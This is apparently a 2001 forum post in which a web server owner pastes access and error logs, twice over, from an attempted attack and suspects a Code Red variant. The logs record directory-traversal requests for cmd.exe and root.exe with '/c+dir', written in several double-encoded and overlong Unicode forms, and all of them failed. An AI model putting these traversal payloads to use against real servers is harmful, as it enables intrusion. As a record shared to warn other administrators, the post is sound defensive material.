Nanotech9
09-18-2001, 07:39 AM
i copied this from my screen logs on my webserver... i cant make heads or tales of it, except that someone or something itr trying to desperately **** up my webserver. I think it may be a mutated version or Code Redworm...
Watch your servers ppl.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..%2f..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..Áœ..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..À¯..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\msadc\..%5c..\..%5c..\..%5c\..Á..\..Á..\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\c\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\MSADC\root.exe" - The system cannot find the path specified.
frp1h51.coserv.net 209.223.6.27 - [18/Sep/2001:21:38:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\root.exe" - The system cannot find the path specified.
TCP/IP Stack: WinSock 2.0 (1.1; 2.2) running on Windows NT/2000
Watch your servers ppl.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..%2f..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..Áœ..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..À¯..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\msadc\..%5c..\..%5c..\..%5c\..Á..\..Á..\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\c\winnt\system32\cmd.exe" - The system cannot find the path specified.
wqn.com 209.223.6.27 - [18/Sep/2001:21:43:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\MSADC\root.exe" - The system cannot find the path specified.
frp1h51.coserv.net 209.223.6.27 - [18/Sep/2001:21:38:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
Error reading "D:\FTP\public\scripts\root.exe" - The system cannot find the path specified.
TCP/IP Stack: WinSock 2.0 (1.1; 2.2) running on Windows NT/2000